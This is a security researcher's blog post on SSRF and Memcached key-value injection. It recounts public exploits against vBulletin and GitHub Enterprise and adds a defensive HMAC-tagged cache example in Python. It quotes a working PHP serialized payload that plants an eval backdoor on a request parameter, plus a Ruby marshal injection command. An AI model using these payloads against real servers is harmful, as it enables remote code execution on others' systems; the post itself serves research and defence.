SSRF, Memcached and other key-value injections in the wild

Back in 2012 we released different techniques to exploit Memcached servers and other services with host-based authentication through SSRF.

Two years later, in 2014, I presented Memcached injection techniques at Black Hat USA (https://www.blackhat.com/docs/us-14/materials/us-14-Novikov-The-New-Page-Of-Injections-Book-Memcached-Injections-WP.pdf). There I mentioned that it’s possible to exploit them as Remote Code Execution vulnerabilities when the data is unserialized on the application side.

Then in 2016 I released the same approach for other key-value databases, such as Redis, Riak and CouchDB (http://www.syscan.org/slides/2016_SG_Ivan_Novikov_Key-value_injections_here.pdf).

And I am very pleased that all these studies were not in vain!

Two years ago (2015) we registered the first public exploit for vBulletin which used an SSRF vulnerability to inject arbitrary serialized data into Memcached. Here it is:

The payload there looks like:

set pluginlist 0 0 96
a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();}";

It’s PHP serialized data that is put into the Memcached key “pluginlist”. The value from this key will be read by vBulletin, then unserialized and executed.

This year the second SSRF/Memcached exploit was released. It’s a GitHub Enterprise vulnerability:

https://www.exploit-db.com/exploits/42392/

The payload is listed below:

set githubproductionsearch/queries/code_query:857be82362ba02525cef496458ffb09cf30f6256:v3:count 0 60 <LEN>

As you can see, it’s Ruby marshal serialized data. The payload is almost the same as the previous one, but with a different serialization format.
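
Both payloads work because the application deserializes whatever it finds under a cache key. One way to close that gap, as an added example (not code from vBulletin, GitHub Enterprise or the original research): the application stores plain JSON and tags each cached value with an HMAC, so a value written straight into the cache is discarded before any parsing. The dict `store` stands in for a Memcached client, and `seal`, `unseal`, `read_plugins` and the demo key are hypothetical names.

```python
import hashlib
import hmac
import json

# Assumption: this key lives only in the application's configuration, never
# in the cache, so someone who can only write to the cache cannot forge a tag.
CACHE_HMAC_KEY = b"constructed-demo-key"
TAG_LEN = hashlib.sha256().digest_size  # 32 bytes


class UntrustedCacheValue(Exception):
    """Raised when a cached value carries no valid tag."""


def _tag(cache_key: str, body: bytes) -> bytes:
    # Bind the cache key into the MAC so a sealed value copied from one key
    # cannot be replayed under another (for example under "pluginlist").
    msg = cache_key.encode() + b"\x00" + body
    return hmac.new(CACHE_HMAC_KEY, msg, hashlib.sha256).digest()


def seal(cache_key: str, value) -> bytes:
    """Serialize as JSON (data only, no object revival) and prepend the tag."""
    body = json.dumps(value, separators=(",", ":")).encode()
    return _tag(cache_key, body) + body


def unseal(cache_key: str, blob: bytes):
    """Verify the tag first; parse only bytes the application itself wrote."""
    tag, body = blob[:TAG_LEN], blob[TAG_LEN:]
    if len(tag) != TAG_LEN or not hmac.compare_digest(tag, _tag(cache_key, body)):
        raise UntrustedCacheValue(cache_key)
    return json.loads(body)


def read_plugins(store: dict, cache_key: str = "pluginlist"):
    """Treat a missing or unauthenticated entry as a cache miss."""
    blob = store.get(cache_key)
    if blob is None:
        return None
    try:
        return unseal(cache_key, blob)
    except UntrustedCacheValue:
        store.pop(cache_key, None)  # evict; caller rebuilds from the real source
        return None
```

A rejected entry is also worth logging, since a legitimate writer never produces one.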

So, it’s really cool that my previous research found some practical applications. I hope that somebody will finally find something with Python/Pickle ;)

Enjoy!

CEO at Wallarm. Application security platform to prevent threats and discover vulnerabilities in real time.
